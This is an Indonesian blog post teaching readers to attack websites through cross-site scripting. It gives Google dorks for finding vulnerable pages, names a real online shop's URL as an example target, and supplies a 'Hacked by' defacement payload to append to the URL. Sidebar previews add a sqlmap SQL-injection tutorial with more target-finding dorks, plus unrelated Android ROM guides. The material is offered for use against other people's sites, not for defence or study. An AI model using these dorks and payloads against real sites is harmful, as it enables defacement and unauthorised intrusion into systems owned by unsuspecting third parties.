cara attack website dengan XSS

sebelum memulai alangkah baiknya kita mengenal apa itu XSS

XSS (cross site scripting adalah salah satu metode untuk mengeksploitasi suatu system. XSS bisa dilakukan jika terjadi kesalahan penulisan script dihalaman website yang mengijinkan beberapa karakter  tertentu di jalankan pada situs website tersebut. XSS hanya bisa dilihat secara temporary/sementara saja (hanya dibrowser kita saja) 

     untun mencari target XSS masukan keyword atau dork ini di google (pilih salah satu) :

inurl:"/showcatrows.php?CategoryID=
allinurl:index.php?page=
allinurl:index.php?action=
allinurl:index.php?go=

nahhhhhhh setelah dork itu pilih salah satu target  hasil pencarian google tadi misal :
http://www.kirschenholz-shop.de/showcatrows.php?CategoryID=2


maka tambahkan script exploitnya :
"><marquee><h1>Hacked by anakatolu</h1></marquee> (dibelakang url)


selesai !!!!!!

Komentar

Posting Komentar

Postingan populer dari blog ini

Tutorial sql injection menggunakan sqlmap di kali linux dan windows

Gambar
assalamualaikum........... ohhya sebelum memulai saya kasih penjelasan dulunih apa itu sqlmap. SQLMAP  adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database. nahhh udah tau kan apa itu sqlmap : kalau gitu langsung ke tkp aja, alat tempur buat windows python sqlmap TUTORIAL kedua file di atas : 1. install phyton seperti biasa, dan extrak sqlmap dan save ke drive C;     contoh :      2. cari website yang vuln terhadap sqli, untuk mencarinya masukan dork berikut : inurl:games.php?id=  inurl:page.php?file=  inurl:newsDetail.php?id=  inurl:gallery.php?id=  inurl:article.php?id=  inurl:show.php?id=  inurl:staff_id=  inurl:newsitem.php?num=  inurl:readnews.php?id=  inurl:top10.php?cat=  inurl:historialeer.php?num=  inurl:reagir.php?num=  inurl:Stray-Questions-View.php?num=  inurl:forum_bds.php?...
Read more »

Build Kali NetHunter For Xiaomi Redmi Note 2

"0RAN9M1L1T3R" Jum'at, 24/03/2016, Setelah beberapa hari gagal update ./bootstrap.sh pada kali nethunter di karenakan koneksi jaringan, dan sore tadi perintah itu di jalankan dan sukses membuat file installler kali nethunter untu device saya, tidak mau basa basi dengan omongan tidak jelas saya di atas mari kita mulai bagai mana cara build kali nethunter ini : 1. buka terminal linux anda dan jalankan perintah berikut git clone https://github.com/offensive-security/kali-nethunter.git 2. masuk ke folder nethunter-installer cd kali-nethunter/nethunter-installer/ 3. jalankan file bootstrap.sh pilih {Y} dan tunggu sampai selesai ./bootstrap.sh setelah menjalankan file bootstrap.sh kita tidak langsung mejalankan file build.py dikarenakan device yang ingin kita pasang tidak terdaftar pada bagian device, untuk mengakalinya kita buat satu folder kosong pada bagian device dan jenis os dengan memasukan codename android kita, contoh note 2 adalah hermes kita buat folder denga...
Read more »

Install Android 7.1 nougat on Xiaomi Redmi Note 2

ORANGMILITER         Bertukaran smart phone dengan istri saya membuat saya terpaksa menggunakan kembali Xiaomi Redmi Note 2 saya dulu, dibalik tukar-tukaran ini ada niat membeli smart phone rilisan xiaomi baru-baru ini, walau niatnya membeli yang baru untuk digunakan istri saya, ya mau gimana lagi orangnya ndak mau :D. pada device saya sekarang saya menggunakan lineageOS-14.1 dimana sekarang terpasang Android 7.1 nougat, pemasangan ini bukan karna bosan dengan tampilan miui, melainkan pada versi Androin 5.0 lolipop di xiaomi redmi note 2 terjadi banyak masalah , seperti tidak bisa memperbaharui android webview , memasang aplikasi ojek online, memperbaharui google chrome dan lain sebagainya.              Pemasangan Android 7.1 Nougat (lineageOS-14.1) tidak lah sulit, cukup rooting device anda pasang TWRP dan flash lineageOS dan gapps, atau dengan mengkiti cara berikut : kebutuhan : Downlad lineageOS  disini ...
Read more »